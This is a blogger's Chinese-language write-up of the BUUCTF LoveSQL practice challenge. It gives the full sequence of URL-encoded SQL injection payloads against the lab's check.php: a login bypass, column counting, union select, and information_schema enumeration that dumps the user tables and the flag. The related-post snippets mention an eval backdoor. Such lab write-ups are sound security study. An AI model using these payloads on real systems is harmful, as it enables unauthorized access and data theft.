buu [极客大挑战 2019]LoveSQL 1

最新推荐文章于 2022-11-27 22:14:35 发布
最新推荐文章于 2022-11-27 22:14:35 发布
阅读量1.9k 收藏 14
点赞数 12
分类专栏: buuctf ctf 刷题日记 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/112439987
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

buu [极客大挑战 2019]LoveSQL 1 -刷题个人日记

小白一个,写给自己看。
进去后是这样:
在这里插入图片描述用户名输入11'测试
发现1'报错
在这里插入图片描述有sql语法错误,说明有sql注入点且后台数据库是MariaDB
用户名输入sql注入基本公式:1' or 1=1;#
在这里插入图片描述
结果:
在这里插入图片描述3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。
可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。
慢慢来,payload:

check.php?username=admin' order by 3%23&password=1

%23#的意思,因为是url 所以要url编码
没反应,继续。

check.php?username=admin' order by 4%23&password=1

报错:
在这里插入图片描述
说明有3列,3个属性。
说说这样构造的原因。我看过其他人的wp,在密码上也写了1' or 1=1;#,但这其实不影响什么。只要在用户名上注入成功就会显示
在这里插入图片描述
但密码不能为空,我猜测试会用isset()函数之类的验证并且只要这个后台sql语句为真就会固定返回上面这两个字符串。所以用username=admin'并且注释掉后面(后面应该是密码验证)就可以永真,就一定可以返回Login Success!,这也是密码可以随便填的原因。

继续:

check.php?username=1' union select 1,2,3%23&password=1

在这里插入图片描述
说明只回显第2,第3列。第一列就可能是主码id之类的,这不重要。重要的是我们只要把查询的信息放在第2或第3列就行。
说说这样构造的原因。username等于什么无所谓,不等于admin就行。然后联合查询1,2,3得出结果,可以说明第2列存的是用户名信息,第3列存的是密码信息。至于为什么这样查询会得出这样的结果,我还不知道。可能是这样查询就会得出这样的结果的原因,没有为什么8。
继续:

check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
说明有两个表:geekuser 表和 l0ve1ysq1 表。
先说说这样构造的原因。

check.php?username=1' union select 1,2,group_concat(table_name) 
from information_schema.tables 
where table_schema=database()%23&password=1

我们把表显示在第3列,所以用语句取代3。

  1. group_concat() 用于一个集合显示括号里的信息。简单来说就是一个空(第3列)里显示多组信息。
  2. table_name:表
  3. information_schema:简单来说就是数据库结构的集合,可以是表,列等等。这里后面接.tables就是数据库的表
  4. table_schema:数据库
  5. database():获取数据库信息的函数。

现在先看第一个表geekuser

check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser' and table_schema=database()%23&password=1

结果:
在这里插入图片描述

  1. column_name:列名
  2. information_schema.columns:数据库的列
  3. table_name:表名

geekuser首尾别忘了加单引号。
就和我之前推理的一样,第2列存的是用户名信息,第3列存的是密码信息。
看看里面都存了什么:

check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

在这里插入图片描述

  1. id=1
  2. username=admin
  3. password=3bba40d66c98e28cf3bac11b45edbbab

和我们第一次注入成功后显示页面的用户名和密码相同。
那flag就在第二个表l0ve1ysq1里:

check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' and table_schema=database()%23&password=1

和表1一样:
在这里插入图片描述

check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述
滑到后面可以看到flag。(可以把id,username去掉只显示password减短字符串。)

flag{e66052e6-31a3-4057-9a3e-5d8e6aff1f40}

参考
[极客大挑战 2019]LoveSQL(最基础的sql注入,万能密码登录)

这是篇写给自己的日记,因为只有自己写得出来而且能让读者看懂才能是真的明白了。写之前我以为我是明白的,写完后才算是真正明白了,写这就是个融会贯通的过程。

__byb__
关注
专栏目录
[极客挑战 2019]LoveSQL
kuller_Yan的博客
05-19 317
[极客挑战 2019]LoveSQL-------wp from Kuller_yan 先打开靶场 看看题目 一看就和上一题 easysql 尝试万能钥匙1' or 1=1 # 看起来像md5解密,但是解密失败,继续查询字段,admin' order by 3 # admin' order by 4 # 到4的时候没有正常返回,然后用1' union select 1,2,3 # 回显点为2,3;然后用1' union select 1,database(), version() # 可以看到库名
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 331
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
[极客挑战 2019]LoveSQL 1
热门推荐
satasun的博客
05-20 1万+
一个比较简单的SQL注入题目,写一下做个笔记。 看到登录直接盲猜账号密码admin和password,然后在账号处进行注入,结果还给我试对了。看了一下网上大佬们的做法,发现我就是捡了个漏,正确做法其实是利用万能密码登录,登录后进行注入。接下来把正规做法记录一下: 万能密码如下: 这里账号填1' or 1=1#,密码随便写。 登陆成功,看了一下url,是以get方式进行传参。先在username处测试一下有没有注入点: ?username=1' order by 1%23&password=ads
【CTF_SQL】[极客挑战 2019]LoveSQL 1
十二_的博客
10-22 1684
的WP来学习他们的思路,多刷题,以形成自己的思路,常刷,常总是不可避免的,尽管菜鸟小编并做不到。一般的套路使用之后,我们要先熟悉这个数据库相关SQL注入的基本语法或公式,才能进一步破解;这里,我们就需要对常用的一些编码格式有一定的了解。本道题,我们要观察它是什么编码?一开始,对于菜鸟级别的我们来说,一般是不了解的。再来回想一下,我们刚才出现的编码是什么?编码,参加过全国大学生数学建模大赛的或者知道。进入环境,我们就尝试去最经典的万能密码。不信,咱们最好还是测试一下吧,有点像。所以,sql注入是可以的~~~
极客挑战2019】http(改包)和BUU BRUTE 1 (爆破)
m0_73770225的博客
11-27 1092
极客挑战2019】http(改包)和BUU BRUTE 1 (爆破)
[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2576
CTF,sql注入,web渗透,安全入门
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 412
BUUCTF的[极客挑战 2019]BabySQL 1
buu[极客挑战 2019]Knife 1
hintll的博客
03-23 387
[极客挑战 2019]Knife 打开靶机后: ‘ 直接看到一个提示:白给的shell eval($_POST[“Syc”]); 推测有一个后门shell 中国蚁剑直接连接看一下 连接成功: 在根目录下直接找到flag
[极客挑战 2019]LoveSQL 1(SQL注入)
小谢的博客
06-12 5007
[极客挑战 2019]LoveSQL 1(SQL注入)
CTF---BUUCTF之[极客挑战 2019]LoveSQL 1
weixin_44632787的博客
06-17 1542
CTF练习题里的BUUCTF之[极客挑战 2019]LoveSQL 1 启动我们的挑战项目,这题一看就知道是SQL注入了。。。而且跟上一次做的好像,不知道这一次的难不难。 先来随便输入个“万能钥匙”吧!1’ or 1=1 # 嗯哼?这个是MD5加密吗? 上网找一下MD5在线加解密的网站:https://www.cmd5.com/。 看看能不能得到我们想要的答案 果然没解出来,照理说CTF的题不会这么简单。这个可能是一个陷阱,或者是另外一种解法(反正我不会…)。所以,我们试试正常的解题思路吧!先用
[极客挑战 2019]LoveSQL1
qq_51902218的博客
08-09 270
1. 判断是什么类型的注入 1' 发现报错 原因:select name.passwd from users where username=' 1' ' and password=‘ ’; 有语法错误 所以可以判断为字符型注入 2. 利用order by 语句判断字段数 1' order by 3# 1' order by 4 # 得到字段数为3 3.显位:联合查询查看显示位 1' union select 1,2...
极客挑战 2019]LoveSQL 1
最新发布
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解能力。 参赛者需要根据题目要求,在给定的表中使用合适的 SQL 查询语句,筛选出满足条件的数据,并将查询结果返回。 注意:LoveSQL 1是极客挑战2019中的一个具体题目,与其他题目无关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值